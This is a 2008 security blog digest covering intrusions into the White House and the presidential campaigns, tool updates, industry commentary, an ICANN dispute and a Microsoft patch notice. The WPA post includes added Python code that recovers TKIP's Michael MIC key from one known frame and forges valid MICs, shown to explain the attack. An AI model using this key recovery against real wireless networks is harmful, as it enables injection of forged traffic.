Posted: 08 Nov 2008 06:56 AM CST
In Part I of this week's episode we are joined by Bill Brenner, talking to us and the listeners about the best ways to sell security to upper management.
In Part II we discuss stories and bring on none other than Josh Wright to talk about some of the latest attacks against TKIP.
We are still working on the sound quality problems; we swapped out a few cables this week and it helped. The intro to the show is messed up and Larry and I are only on the left channel, but this does NOT persist throughout the entire episode. Please bear with us while we work towards better sound quality.
Posted: 08 Nov 2008 04:14 AM CST
US officials say Chinese hackers have raided White House email archives multiple times, according to a report. The Financial Times reports some people it describes as "US government cyber experts" suspect the raids were sponsored by the Chinese regime. "We are getting very targeted Chinese attacks so it stretches credulity that these are not directed by government-related organisations," an unnamed source opined. Each attack cracked the unclassified network's defences for a short time. The classified network remained secure, we're assured by the FT's whispers. "For a short period of time, they successfully breach a wall, and then you rebuild the wall ... it is not as if they have continued access. It is constant cat and mouse on this stuff," the source reportedly said. The FT's revelations came just days after Newsweek reported that both the Obama and McCain campaigns had been hacked from overseas, with large amounts of data downloaded, apparently in an attempt to track the candidates' evolving policy positions. This could of course potentially help the unnamed foreign entities in future negotiations. The campaign attacks were picked up by the authorities, with the FBI and the Secret Service notifying the Obama campaign back in August that what staffers thought was a virus was something more sinister. "You have a problem way bigger than what you understand," an FBI agent reportedly told Obama staff members. "You have been compromised, and a serious amount of files have been loaded off your system." –White House network pwned 'multiple' times by Chinese • The Register
Posted: 08 Nov 2008 03:57 AM CST
Where in the world does the average citizen spend just two hours a week online? An isolated backwater, perhaps? Or maybe netizen figures from a far-off land trapped in a time bubble of its own desiring? Well, close. This bastion of digital indifference is Italy, one of our closest neighbours, a super-rich G7 nation and homeland to the inventors of the telephone and radio. –This is social networking, Italian style - The Guardian - Will someone please take care of this, instead of debating suntan? Thanks!
Posted: 08 Nov 2008 03:54 AM CST
Posted: 08 Nov 2008 03:52 AM CST
Death stands before me today like the hope of health for a sick man, like stepping out into the open air after a time of suffering. Death stands before me today like the aroma of incense, like sitting under the sail on the Day of the Great Wind. Death stands before me today like the odor of lotos-blossoms, like the first moments on the edge of sweet drunkenness. Death stands before me today like the end of a long rain, like the homecoming of a soldier a long time at war. Death stands before me today like the clarity of heaven, like the answer long-desired to a heavy riddle. And Death stands before me today like the way a man feels about home after he has spent many years in bondage. –"Dispute of A Man with His Ba", a text from a papyrus manuscript [Berlin 3024] of the 12th Dynasty, ca. 1800 B.C.E.
Posted: 08 Nov 2008 02:45 AM CST
Odd Title... but it's 3:30am.
The first thing I wanted to mention was KiTTY (via /dev/random). It's a fork of PuTTY, which is nice given PuTTY is on a rather slow development cycle, and new features are almost non-existent. Some of the features include folders within the saved sessions box (although not implemented as "friendly" as they could be), transparency (this didn't work for me), login scripts (also didn't work for me) and integrated scp support. The features list is actually quite a bit longer than that; feel free to read it on the KiTTY website. As mentioned, a number of the features didn't work for me. I'm going to give it a try on a second computer before I rule it out, but I wanted to mention it now. A second bad experience would most likely lead to me never using it or mentioning it here, and it may work wonderfully for others.
The second thing I wanted to mention is that Komodo Edit 5.0 (the free version of Komodo IDE) is now available. Some of the biggest things are limited to Komodo IDE unfortunately, such as source code checkout capabilities and the ability to "beautify" your code. It does provide some UI clean-up and an update to Firefox 3.0 in the Edit version though.
Posted: 07 Nov 2008 09:37 PM CST
So courtesy of the folks at SC Magazine and the Security Bloggers Network here is a great offer to attend a great security conference. This offer is for the inaugural SC World Congress this December 9-10, at the Javits Center in NYC. The show has a great schedule and an "A" list of speakers lined up. Unfortunately (or fortunately depending on how you feel about it) no vendors will be speaking, only "real experts", so you won't hear from the likes of me or other vendor pukes.
With the economy the way it is, I know many of you are probably finding it difficult to get budget to pay to attend conferences, not to mention budget for travel and expenses. With so many folks in the metro NYC area, SC World Congress is a great chance to get some top notch sessions in. So here is a way to make it a bit more affordable. If you would like to attend the SC World Congress, here is a quick 35% off! Just use Blog1 (for a one day pass) or Blog2 (for a two day pass) in the special offers section when you register for the show.
There you go, what a deal! I will be at the show as will StillSecure. If you are attending, come by and say hello! Hope to see you there.
Posted: 07 Nov 2008 08:01 PM CST
Posted: 07 Nov 2008 04:07 PM CST
I think it is very likely that network infrastructure will be transformed in coming years by new levels of automation and connectivity intelligence driven by demands from new IT initiatives, from RFID to collaboration, data center virtualization and even cloud computing. I think we'll call this transformed network infrastructure 2.0. The following are recent blogs [...]
Posted: 07 Nov 2008 01:42 PM CST
I have been taking a look at the security industry lately as I get back into being a full time analyst. Preliminary results indicate that about 30% of 1,200 companies I tracked two years ago have either been acquired or have quietly disappeared. Anyone who has followed this blog over those years knows that I often object to calling this industry consolidation.
Posted: 07 Nov 2008 01:03 PM CST
A friend of a friend of mine is an IT consultant that works with many companies (for the sake of blog anonymity, let's call him Steve). At a party last weekend, Steve mentioned that most of his customers are not very large - in fact, some are small brick-and-mortar shops. Regardless of size, they all have two things
Posted: 07 Nov 2008 10:27 AM CST
Posted: 07 Nov 2008 10:23 AM CST
John Pescatore is right when he says that talking about less regulation at this time seems not to be aligned with the current crisis, but the article he is pointing to is very precise in saying that the costs from SOX are pretty high and, as we could see, it wasn’t able to prevent cases like Bear Stearns, Lehman Bros., AIG and Merrill Lynch. Accountants are as creative as lawyers; they will always look for breaches in the controls (laws) to do their magic.
SOX brought a lot of money to Information Security, but it also brought some directed focus on some controls that are not always the most required for all organizations. It would be nice to see a review of the law, verifying its results and actual costs.
Posted: 07 Nov 2008 10:18 AM CST
Now that the presidential race is over Newsweek is reporting that the US Government, through the FBI and Secret Service, notified the Obama and McCain campaigns that their computers had been compromised and sensitive documents copied.
This information demonstrates that the US government has a sophisticated intrusion detection capability. This is likely part of the NSA internet surveillance system that was made public by an AT&T technician in 2006.
It is likely that the system has a set of watch IP ranges that are sensitive from a national security perspective. The campaigns’ computers were probably on this list. The traffic between foreign IP addresses and these watch IPs is then scrutinized for espionage. The pattern of activity flagged would be Microsoft Office documents and PDFs being retrieved or other intruder signs such as an encrypted tunnel with a foreign endpoint.
This shows that the US Government has the capability to detect some types of foreign attacks, although they probably have to be selective about the IP ranges they monitor. It’s nice to know that if the White House computers were leaking documents to China or Russia there is some detection capability, but the fact that this is done at the Internet backbone level means any IP could be targeted, and it might not just be to look for foreign intrusions.
Posted: 07 Nov 2008 09:58 AM CST
A lot of noise was made this week about new research that “cracked” WPA. Well, there are more details about it today, and they clearly show that the WPA sky is not falling.
The article above gives a very good summary of what is happening:
“To describe the attack succinctly, it’s a method of decrypting and arbitrarily and successfully re-encrypting and re-injecting short packets on networks that have devices using TKIP. That’s a very critical distinction; this is a serious attack, and the first real flaw in TKIP that’s been found and exploited. But it’s still a subset of a true key crack.”
So, it’s not the final attack against WPA-protected networks, but it is a very important building block for more elaborate attacks. I can see that in the near future we will see more serious stuff being done using this as a starting point. Keep your ears open.
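The building block the quote describes is the weakness of Michael, the TKIP message integrity code: once an attacker holds the plaintext of one short frame together with its MIC, the MIC key for that direction can be computed directly by running Michael backwards, and from then on forged short frames can carry valid MICs. The following is an added example, not code from the original post or from the researchers; it implements Michael as specified in IEEE 802.11i (including the all-zero-key test vector from the standard and the TKIP MIC input layout DA || SA || priority || three zero bytes || MSDU), and the addresses, key and ARP-sized payload in the demo are constructed.

```python
"""Michael (the TKIP MIC) and key recovery from one known (message, MIC) pair.

Added example, not code from the original post. Algorithm, padding and the
all-zero-key test vector follow IEEE 802.11i; the sample key, MAC addresses
and payload used in demo() are constructed.
"""
import struct

MASK32 = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _ror(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK32


def _xswap(x):
    # Swap the two bytes inside each 16-bit half of the word.
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def _block(l, r):
    # The Michael round function b(l, r): four xor/rotate/add steps.
    r ^= _rol(l, 17)
    l = (l + r) & MASK32
    r ^= _xswap(l)
    l = (l + r) & MASK32
    r ^= _rol(l, 3)
    l = (l + r) & MASK32
    r ^= _ror(l, 2)
    l = (l + r) & MASK32
    return l, r


def _block_inv(l, r):
    # Exact inverse of _block: each step is a modular add or an xor with a
    # function of the other half, so the steps are undone in reverse order.
    l = (l - r) & MASK32
    r ^= _ror(l, 2)
    l = (l - r) & MASK32
    r ^= _rol(l, 3)
    l = (l - r) & MASK32
    r ^= _xswap(l)
    l = (l - r) & MASK32
    r ^= _rol(l, 17)
    return l, r


def _words(msg):
    # Pad with 0x5a and 4..7 zero bytes to a multiple of 4, then split into
    # little-endian 32-bit words.
    padded = msg + b"\x5a" + b"\x00" * 4
    padded += b"\x00" * (-len(padded) % 4)
    return struct.unpack("<%dI" % (len(padded) // 4), padded)


def michael(key, msg):
    """Compute the 8-byte Michael MIC of msg under the 8-byte key."""
    l, r = struct.unpack("<II", key)
    for m in _words(msg):
        l, r = _block(l ^ m, r)
    return struct.pack("<II", l, r)


def recover_key(msg, mic):
    """Run Michael backwards from a known (msg, mic) pair to obtain the key.

    This is the step the TKIP attack leans on: after the plaintext of one
    short frame (and so its MIC) has been recovered, one backward pass
    yields the MIC key for that traffic direction.
    """
    l, r = struct.unpack("<II", mic)
    for m in reversed(_words(msg)):
        l, r = _block_inv(l, r)
        l ^= m
    return struct.pack("<II", l, r)


def tkip_mic_input(da, sa, priority, msdu):
    """Bytes TKIP feeds to Michael: DA || SA || priority || 3 zero bytes || MSDU."""
    return da + sa + bytes([priority, 0, 0, 0]) + msdu


def demo():
    """Recover a constructed MIC key from one ARP-sized frame, then use it to
    MIC a different payload. Returns (recovered_key, forged_mic_is_valid)."""
    key = bytes.fromhex("0123456789abcdef")                    # constructed
    da = bytes.fromhex("001122334455")                         # constructed
    sa = bytes.fromhex("66778899aabb")                         # constructed
    known = tkip_mic_input(da, sa, 0, b"\x08\x06" + b"\x00" * 28)
    recovered = recover_key(known, michael(key, known))
    forged = tkip_mic_input(da, sa, 0, b"\x08\x00" + b"\x11" * 20)
    return recovered, michael(recovered, forged) == michael(key, forged)


if __name__ == "__main__":
    assert michael(bytes(8), b"") == bytes.fromhex("82925c1ca1d130b8")
    print(demo())
```

The all-zero-key, empty-message vector (82925c1ca1d130b8) checks the round function; the demo shows that a single known frame is enough to reproduce the key and to MIC an arbitrary new payload in the same direction. This is exactly why 802.11i pairs Michael with countermeasures (a rekey after two MIC failures in a minute) and why the attack is confined to a handful of short frames rather than being a key crack.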
Posted: 07 Nov 2008 09:32 AM CST
A Financial Times article discusses multiple security compromises in the White House network. Heike has already blogged about both President-Elect Obama’s and Senator McCain’s campaign networks being compromised by foreign hackers as well. The network of my precinct committee chairperson is next. From the article:
As usual, the article is slim on technical details and fills in the space with general cybersecurity background. At this point, it may be easier to list the government organizations that haven’t been compromised by Chinese hackers.
Posted: 07 Nov 2008 08:58 AM CST
I've written about the link between NAC and MSP before, and the success of NAC in the higher education market is certainly no secret. More and more of our higher ed customers have been talking lately about outsourcing their residential networks. This seems to make sense on a number of levels, provided that the schools can work out a structure for the support as well as engineering and maintenance of the residential network. Certainly, it makes sense to have NAC as an integral part of the managed resnet service, but it also has the potential to go much farther than that, including services like voice and on-demand video in addition to data. Network Vigilance, a company based in San Diego, CA, provides managed NAC services today. Another company based here in Austin, Apogee has managed residential services as their primary business function and seems to be making a go of it (except for the domain name, seriously..).
Despite the macro economic conditions (and perhaps because of them), I think this has real growth potential. Having what amounts to a specialized MSP provide authenticated, well-governed network access to residential halls, freeing on-campus network staff to focus more on backbone services, and providing school administrators with a predictable cost structure that can be baked into the cost of the dorm room seems to make sense for everyone. Just don't forget the "authenticated, well-governed" part.
Posted: 07 Nov 2008 08:30 AM CST
Posted: 07 Nov 2008 08:21 AM CST
Further Evidence Pointing To ICANN Failures
News today, from our friends at KnujOn of failed attempts (due to intervention by ICANN officials) to bring reports of nefarious criminal activity within the Domain Registrar accreditation system to ICANN.
Infosecurity.US is calling for law enforcement to investigate this issue, and the participatory actions of ICANN officials, who appear, anecdotally, to be quite pleased with the current status, regardless of evidence pointing to potentially surreptitious domain registrar accreditation data. The full KnujOn posting appears after the break.
From the post: “KnujOn Censored at ICANN Session“
In an unusual and shocking move Dr. Robert Bruen was interrupted and silenced at an open, cross-function ICANN meeting in Cairo Monday. At a meeting entitled: “ Open Joint Session (GNSO, ccNSO, GAC, ALAC): Domain Name Space" Dr. Bruen was handed the microphone in the question and answer portion. As he began speaking about the problems of compliance and the need for better controls within the expanding Internet, specifically in relation to criminal infiltration of the Domain Name space, Patrick Sharry (ICANN ccNSO Consultant) stopped Dr. Bruen and said: “I don’t want to pursue it any more in this forum.” Chris Disspain (CEO of Australian Domain Administration) followed this rare dismissal by saying: "[if] it turns into an open microphone, then I, for one, won’t be supporting it again." Meaning he would no longer support question and answer portions at ICANN sessions.
This was quite a shock after several other attendees were able to ask lengthy questions uninterrupted. However, Dr. Bruen should have known he was walking on thin ice. Once he introduced himself as a KnujOn representative Patrick Sharry told him to "keep it brief."
This is somewhat reminiscent of Peter Dengate-Thrush's response to questions from KnujOn's Garth Bruen at the Washington D.C. ICANN Session entitled: "Improving Institutional Confidence consultation" KnujOn brought up issues of criminality, contract violations, and exclusion of the Internet consumer. Dengate-Thrush admonished Bruen that "this was not relevant to institutional confidence." Later at this same session Dengate-Thrush told the audience that he did not "want to hear from any more angry IP lawyers." Many of the attendees were attorneys representing brand holders being exploited by cyber-squatters and counterfeiters. The Intellectual Property community expressed its feeling of being marginalized by ICANN in favor of shadowy criminal interests.
So, as at the Cairo meeting, open forums only seem open if the panel wants to hear the question. The summary dismissal of Dr. Bruen can only be seen as prejudiced as it violates Sharry's own ground rules for the session:
Dr. Bruen's unasked and unanswered question concerned the fact that since the existing compliance structure is inadequate, how can ICANN ensure contractual compliance is enforced in a rapidly expanded Internet? Furthermore, Sharry opened the session with this commitment:
"We will try, as we do that, on the way through, to involve a little bit of at least conversation, if not a little bit of conflict or argument or heated debate or discussion or something like that is(sic) well. And we will see how we go then, bringing the audience into that conversation."
But, as we can see, no debate or discussion was allowed. Since the serious issue of Registrar Secrecy has emerged, we simply want to know if this will be allowed to continue within the new Domain Registrar space or whether common-sense policy will be implemented. If the issues of contract violations, criminality in the Registrar community, and exclusion of the consumer are not relevant to improving institutional confidence, then what is?
KnujOn will be contacting Sharry and Disspain directly, as well as ICANN's Ombudsman, to get a better explanation. We are speaking on behalf of the consumer and won't be silenced.
Posted: 07 Nov 2008 07:42 AM CST
Infosecurity.US continues our Genius Series with an obvious choice of subject, this time Alan Mathison Turing, Ph.D., OBE, FRS. Dr. Turing (23 June 1912 - 7 June 1954) was a British mathematician and cryptographer, considered one of the fathers of modern computer science, and a significant figure in the Allies' successful cracking of Nazi Germany’s cryptographic systems, thereby bringing a swifter end to World War II. Further information, including a couple of short videos, appears after the break.
From the “Encyclopedia of World Biography”:
“The British mathematician Alan Mathison Turing (1912-1954) was noted for his contributions to mathematical logic and to the early theory, construction, and use of computers.
Alan Turing was born in London, England, on June 23, 1912. Both his parents had upper middle class origins, and his father continued that tradition as an administrator in the Indian civil service. With his father off in India, Turing was sent away to private boarding schools. After some early problems with social adjustment, he distinguished himself in mathematics and science.
Turing’s exceptional mathematical abilities were first generally recognized in his college years (1931-1936) at King’s College of Cambridge University. His most important mathematical work, “On Computable Numbers,” was written in Cambridge in 1936. In this paper Turing answered a question of great significance to mathematical logic–namely, which functions in mathematics can be computed by an entirely mechanical procedure. His answer was phrased in terms of a theoretical machine (today known as the “Turing machine”) which could mechanically carry out these computations. Embodied in the Turing machine idea is the concept of the stored program computer.”
Posted: 07 Nov 2008 07:41 AM CST
Infosecurity.US carries on with our Heroes Series, focusing this time on Legion of Merit with Combat Distinguishing Device recipient Juan Ayala, COL, USMC. He was awarded the Legion of Merit for efforts in building up the 1st Iraqi Army Division, thereby assisting in protecting the lives of fellow Marines, other service members in-theater, colleagues in the Iraqi Army and Iraqi citizenry.
A secure Iraq requires competent local police and national army. In Iraq, U.S. commanders have helped achieve stability in former hotbeds of violence by building up Iraqi Security Forces, thanks to the creative efforts of soldiers and Marines, such as Marine Corps Col. Juan Ayala.
During his third tour in Iraq, from January 2006 to January 2007, Col. Ayala served as the Senior Advisor to the 1st Iraqi Army Division, based at Camp Habbaniyah. Numerous challenges faced Ayala and his 29-man team, as they operated daily in tandem with the Iraqis. The Division lacked soldiers, trained officers and equipment. The surrounding terrain proved hostile as well. In early 2006, Anbar province remained volatile, and the Iraqi Army often found itself engaged in battles with civilians allied with insurgents.
Over time, under Ayala's guidance, the Iraqis increased their areas of responsibility and gained credibility among the population. Specifically, Col. Ayala revamped the staff functions of the Division, drawing up missions that fit its skill set. He collaborated with local imams and sheiks to obtain approval for operations. As a result of the built-up trust, the flow of actionable intelligence to the Division increased, as did the number of formerly hostile Sunnis to the Division's ranks. So many ended up joining the Iraqi forces that they eventually gained a title: the "sons of Al Anbar."
Ayala helped plan and execute 52 direct action patrols in the area, which yielded 25 captured insurgents. Ayala's input resulted in the creation of a 24-hour joint Iraqi/Advisor Combat Operations Center, which helped obtain situational awareness on the ground. Other positive developments under Ayala's tenure included equipment improvements and the purging of hundreds of bogus soldiers from the Division's ranks. Under Ayala, the implementation of a Unit Tracking Program (UTP) was influential in maintaining accountability among the Iraqi soldiers in the Division.
Ayala often went on patrols, serving as a vehicle and convoy commander. He was hit twice by IEDs, but kept going out on missions to assess the Division's ability in the field. He led 17 teams and 225 advisors at different levels of command, to improve the capabilities of the Division. Today, two of the Division's Brigades, the 3rd and the 4th, function without coalition assistance.
For his efforts in building up the 1st Iraqi Army Division, Col. Ayala earned the Legion of Merit with Combat Distinguishing Device.
Posted: 07 Nov 2008 04:18 AM CST
This requirement applies to Authorized IRS e-file Providers participating in Online Filing of individual income tax returns that collect taxpayer information via the Internet. These Providers shall possess a valid and current Extended Validation Secure Socket Layer (SSL) certificate using SSL 3.0 / TLS 1.0 or later, and minimum 1024-bit RSA / 128-bit AES.
This passage refers to the service that may be offered by sites whereby you can file your taxes directly online from your own computer. The e-file program offers free filing to individual taxpayers with household income under a certain threshold ($54,000 in 2007) and for-fee filing to any individual. (It also offers filing services to businesses and the self-employed, but those groups are outside this requirement, at least for 2009.) You may recall that online tax scams, including phishing attacks, have run rampant during the past two tax seasons. I believe that's what motivates this decision by the IRS, which seeks to offer e-filing to the populace in a widespread and egalitarian way while minimizing the individual's risk of identity theft.
Posted: 07 Nov 2008 03:58 AM CST
After reading Haoyue's "Analysis of the pros and cons of firewall and UTM products OEMing third-party products or embedding third-party anti-virus engines", I closed the book and reflected; these views confirmed several points I had discussed with friends a few days earlier. In recent years the firewall and intrusion detection system (IDS) landscape has evolved into a three-way contest between firewalls (FW), intrusion prevention systems (IPS) and unified threat management (UTM) systems, and the claim that UTM will replace the firewall has attracted considerable attention. Haoyue's article offers much deeper thinking on this. Matched against the last few years of security operations experience, the following three points may have a considerable impact on the FW/IPS versus UTM debate:
Appropriateness of position and policy: fighting malicious code at the gateway is not a once-and-for-all solution. On one hand, the ultimate target of malicious code is not the gateway but the various endpoint nodes on the internal network behind it, and relying solely on gateway anti-virus produces the "one breach, total compromise" phenomenon. On the other hand, malicious code does not exist in isolation; it necessarily spreads its impact through various behaviours (scanning, attacking, stealing, and so on), and these behaviours are simply undetectable by today's inline firewalls and UTM devices whose anti-virus function is static matching through a file-proxy approach.
Differences in update frequency: a traditional firewall is, in theory, a stable, policy-oriented, high-performance security component that exerts control through the configuration and modification of policy; in the worst case, even if it cannot guarantee that the predefined security policy is enforced, it can cut the network egress connection by blocking everything. In other words, even if it cannot respond to threats inside the internal network, it can stop them spreading further through the network egress. Anti-virus, by contrast, is a changeable, malicious-code-oriented, readily extensible security component; its signature database and program modules are updated far more frequently than firewall-class security products. For UTM products, the unified functional architecture lays the foundation for adding new functions, but this is not a simple process of stacking or addition; on the contrary, when changeable components and stable components end up on the same hardware at the same deployment position, every function is significantly compromised, and the anti-virus engine has the highest probability of instability.
Particularities of operations and management: for IT managers, the most fundamental goal is to ensure that business continuity is not disrupted. If an anti-virus-capable firewall or a new-style UTM device sitting inline at the network egress is frequently upgraded or has its security policy frequently changed, that will inevitably introduce risk and may seriously harm business availability, in which case the loss outweighs the gain.
- Click to download the original (pdf) -
Posted: 07 Nov 2008 01:49 AM CST
Posted: 06 Nov 2008 07:19 PM CST
Microsoft Corporation (NasdaqGS: MSFT) has released advance notification of its famous Patch Tuesday effort, now slated for November 11, 2008 (Veterans Day in the United States and Remembrance Day in Canada), probably not the best choice of day to release major security patches….
The full text of the notification appears after the break.
Microsoft Security Bulletin Advance Notification for November 2008
Issued: November 6, 2008
This is an advance notification of security bulletins that
The full version of the Microsoft Security Bulletin Advance
This bulletin advance notification will be replaced with the
To receive automatic notifications whenever Microsoft Security
Microsoft will host a webcast to address customer questions on
Microsoft also provides information to help customers prioritize
This advance notification provides the software subject as the
Critical Security Bulletins
Windows Bulletin 1
- Affected Software:
- Impact: Remote Code Execution
Important Security Bulletins
Windows Bulletin 2
- Affected Software:
- Impact: Remote Code Execution
Posted: 06 Nov 2008 03:36 PM CST
With the recent release of v5 of the Security Intelligence Report, I decided to produce a couple of webcast videos where I present my findings to you directly in a brief presentation. In this first one, I go over the industry-wide trends.
Best regards, Jeff
Posted: 06 Nov 2008 03:07 PM CST
I stare in disbelief...
You are subscribed to email updates from Security Bloggers Network